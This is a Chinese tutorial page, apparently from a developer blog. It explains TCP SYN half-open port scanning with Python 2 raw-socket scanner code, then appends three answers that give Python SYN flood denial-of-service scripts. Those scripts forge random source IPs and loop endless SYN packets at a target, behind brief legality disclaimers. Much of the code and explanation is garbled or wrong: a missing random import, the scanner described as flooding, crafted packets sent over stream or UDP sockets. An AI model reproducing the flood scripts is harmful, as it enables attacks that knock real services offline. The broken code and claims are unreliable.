python实现syn半扫描_python 使用raw socket进行TCP SYN扫描实例

1. TCP SYN扫描

端口扫描常用于用于探测服务器或主机开放端口情况,被计算机管理员用于确认安全策略,同时被攻击者用于识别目标主机上的可运作的网络服务。端口扫描是向一定范围的服务器端口发送对应请求,以此确认可使用的端口。虽然其本身并不是恶意的网络活动,但也是网络攻击者探测目标主机服务,以利用该服务的已知漏洞的重要手段。

TCP SYN扫描是端口扫描众多方式中的一种,其他方式包括TCP扫描,UDP扫描,ACK扫描,窗口扫描和FIN扫描等。

TCP SYN扫描是另一种TCP扫描。端口扫描工具不使用操作系统原生网络功能,而是自行生成、发送IP数据包,并监控其回应。这种扫描模式被称为“半开放扫描”,因为它从不建立完整的TCP连接。端口扫描工具生成一个SYN包,如果目标端口开放,则会返回SYN-ACK包。扫描端回应一个RST包,然后在握手完成前关闭连接。如果端口关闭了但未使用过滤,目标端口应该会持续返回RST包。

TCP SYN扫描优点:

给扫描工具全权控制数据包发送和等待回应时长的权力,允许更详细的回应分析。

SYN扫描从不会建立完整的连接。

2. python 代码

使用raw socket进行SYN 洪泛,封装多个函数使其模块化和易于理解。利用结构体可以方便的使用格式化字符串和变量列表来编码数据包。

#!/usr/bin/env python

# -*- coding: UTF-8 -*-

# 必须以root权限运行

import socket

import sys

import time

from struct import *

# 计算校验和

def checksum(msg):

s = 0

# 每次取2个字节

for i in range(0,len(msg),2):

w = (ord(msg[i]) << 8) + (ord(msg[i+1]))

s = s+w

s = (s>>16) + (s & 0xffff)

s = ~s & 0xffff

return s

def CreateSocket(source_ip,dest_ip):

try:

s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)

except socket.error, msg:

print "Socket create error: ",str(msg[0]),"message: ",msg[1]

sys.exit()

# 设置手工提供IP头部

s.setsockopt(socket.IPPROTO_TCP, socket.IP_HDRINCL, 1)

return s

# 创建IP头部

def CreateIpHeader(source_ip, dest_ip):

packet = ""

# ip 头部选项

headerlen = 5

version = 4

tos = 0

tot_len = 20 + 20

id = random.randrange(18000,65535,1)

frag_off = 0

ttl = 255

protocol = socket.IPPROTO_TCP

check = 10

saddr = socket.inet_aton ( source_ip )

daddr = socket.inet_aton ( dest_ip )

hl_version = (version << 4) + headerlen

ip_header = pack("!BBHHHBBH4s4s", hl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)

return ip_header

# 创建TCP头部

def create_tcp_syn_header(source_ip, dest_ip, dest_port):

# tcp 头部选项

source = random.randrange(32000,62000,1) # 随机化一个源端口

seq = 0

ack_seq = 0

doff = 5

# tcp flags

fin = 0

syn = 1

rst = 0

psh = 0

ack = 0

urg = 0

window = socket.htons (8192) # 最大窗口大小

check = 0

urg_ptr = 0

offset_res = (doff << 4) + 0

tcp_flags = fin + (syn<<1) + (rst<<2) + (psh<<3) + (ack<<4) + (urg<<5)

tcp_header = pack("!HHLLBBHHH", source, dest_port, seq, ack_seq, offset_res, tcp_flags, window, check, urg_ptr)

# 伪头部选项

source_address = socket.inet_aton( source_ip )

dest_address = socket.inet_aton( dest_ip )

placeholder = 0

protocol = socket.IPPROTO_TCP

tcp_length = len(tcp_header)

psh = pack("!4s4sBBH", source_address, dest_address, placeholder, protocol, tcp_length);

psh = psh + tcp_header;

tcp_checksum = checksum(psh)

# 重新打包TCP头部,并填充正确地校验和

tcp_header = pack("!HHLLBBHHH", source, dest_port, seq, ack_seq, offset_res, tcp_flags, window, tcp_checksum, urg_ptr)

return tcp_header

def range_scan(source_ip, dest_ip, start_port, end_port) :

syn_ack_received = [] # 开放端口存储列表

for j in range (start_port, end_port) :

s = CreateSocket(source_ip, dest_ip)

ip_header = CreateIpHeader(source_ip, dest_ip)

tcp_header = create_tcp_syn_header(source_ip, dest_ip,j)

packet = ip_header + tcp_header

s.sendto(packet, (dest_ip, 0))

data = s.recvfrom(1024) [0][0:]

ip_header_len = (ord(data[0]) & 0x0f) * 4

ip_header_ret = data[0: ip_header_len - 1]

tcp_header_len = (ord(data[32]) & 0xf0)>>2

tcp_header_ret = data[ip_header_len:ip_header_len+tcp_header_len - 1]

if ord(tcp_header_ret[13]) == 0x12: # SYN/ACK flags

syn_ack_received.append(j)

return syn_ack_received

# 程序从这里开始:

open_port_list = []

ipsource = "192.168.1.95"

ipdest = "192.168.1.31"

start = 100

stop = 450

step = (stop-start)/10

scan_ports = range(start, stop, step)

if scan_ports[len(scan_ports)-1] < stop:

scan_ports.append(stop)

for i in range(len(scan_ports)-1):

opl = range_scan(ipsource, ipdest, scan_ports[i], scan_ports[i+1])

open_port_list.append(opl)

for i in range(len(open_port_list)):

print "Process #: ",i," Open ports: ",open_port_list[i]

print "A list of all open ports found: "

for i in range(len(open_port_list)):

for j in range(len(open_port_list[i])):

print open_port_list[i][j],", "

以上这篇python 使用raw socket进行TCP SYN扫描实例就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多支持云海天教程。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: Python实现SYN Flood攻击是利用Python编程语言实现SYN Flood攻击技术。SYN Flood攻击是一种网络攻击技术,它会造成网络资源的严重耗尽,进而导致目标主机无法正常工作。Python语言具有易学易用的特点,可以方便地实现SYN Flood攻击,但这种行为是违法的,请勿尝试。 ### 回答2: Syn flood攻击是一种常见的网络攻击方式,其实现方式比较简单,主要是通过向目标服务器发送大量的TCP连接请求,消耗服务器资源,导致服务器无法正常处理其他合法请求,从而使服务不可用。Python作为一种高级编程语言,在网络编程方面具有很大的优势,可以用Python编写简单的Syn flood攻击脚本。 在Python实现Syn flood攻击,通常需要使用socket模块。使用socket创建一个TCP连接,通过设置header信息和payload信息模拟发送连接请求。在Syn flood攻击中,需要注意的是不需要与服务器正常建立连接,因此需要设置一些特殊的标志位。具体实现步骤如下: 1. 导入所需的模块: ``` import socket import random import struct import sys import time ``` 2. 定义目标服务器IP和Port: ``` target_ip = '192.168.0.1' target_port = 80 ``` 3. 定义socket连接: ``` # 创建TCP socket连接 tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ``` 4. 设置socket超时时间: ``` tcp_socket.settimeout(1) ``` 5. 开始攻击: ``` while True: # 随机生成源IP和Port src_ip = '%d.%d.%d.%d' % (random.randint(1, 254),random.randint(1, 254),random.randint(1, 254),random.randint(1, 254)) src_port = random.randint(1000, 65535) # 组合header信息和payload信息 ip_header = struct.pack('!BBHHHBBH4s4s', 69, 0, 40, random.randint(1, 65535), 0, 64, 6, 0, socket.inet_aton(src_ip), socket.inet_aton(target_ip)) tcp_header = struct.pack('!HHLLBBHHH', src_port, target_port, random.randint(1, 4294967295), 0, 2, 2, 16384, 0, 0) payload = 'Attack' # 组合发送信息 packet = ip_header + tcp_header + payload.encode() # 发送攻击信息 tcp_socket.sendto(packet, (target_ip, target_port)) # 控制发送速率 time.sleep(0.01) ``` 上述代码中,使用了循环控制发送攻击信息的频率,并通过随机生成源IP和Port以及组合特殊的header信息和payload信息来模拟Syn flood攻击。 需要注意的是,Syn flood攻击是一种非法的行为,会对目标服务器造成极大的损失,严重时甚至可能导致服务不可用。因此,在编写和使用此类脚本时,应当遵守相关的法律法规和道德规范,不得用于非法用途。 ### 回答3: 首先,Syn Flood攻击是一种DDoS攻击,通过发送大量的SYN请求给目标服务器,并不断地伪造源IP地址和端口号,来使服务器资源耗尽,从而导致服务器无法正常运行,甚至崩溃。在Python中,我们可以使用socket库来实现Syn Flood攻击。 1. 首先,我们需要创建一个Socket对象,使用IP协议进行通信,并设置为UDP协议。 ```python import socket target_ip = "127.0.0.1" # 目标IP地址 target_port = 80 # 目标端口号 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((target_ip, 0)) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) sock.setsockopt(socket.IPPROTO_IP, socket.IP_MTU_DISCOVER, socket.IP_PMTUDISC_DO) ``` 2. 接着,创建IP和TCP头文件,并设置TCP头文件中的SYN标志位为1,表示初次握手请求,并随机生成源IP地址和端口号。 ```python import random def generate_ip_header(source_ip, dest_ip): ip_header = struct.pack('!BBHHHBBH4s4s', 69, 0, 20, 3230, 0, 2, 0, 0, source_ip, dest_ip) return ip_header def generate_tcp_header(source_port, dest_port, sequence, syn_flag): tcp_header = struct.pack('!HHLLBBHHH', source_port, dest_port, sequence, 0, (5 << 4) + 0, syn_flag, 2048, 0, 0) return tcp_header while True: source_ip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff))) source_port = random.randint(1024, 65535) dest_ip = socket.inet_aton(target_ip) dest_port = target_port sequence = random.randint(0, 0xffffffff) syn_flag = 1 ip_header = generate_ip_header(source_ip, dest_ip) tcp_header = generate_tcp_header(source_port, dest_port, sequence, syn_flag) packet = ip_header + tcp_header sock.sendto(packet, (target_ip, target_port)) ``` 3. 最后,我们可以通过不断地发送SYN请求包,来实现Syn Flood攻击。 需要注意的是,由于我们使用的是UDP协议,所以在发送SYN请求包时,需要设置IP数据报头的长度为20字节,并把TCP头文件插入到其中。 总体来说,Python实现Syn Flood攻击的代码并不复杂,但是这种攻击行为是违法的,可能会造成严重的后果。因此,我们应该遵守法律规定,不要尝试进行此类攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值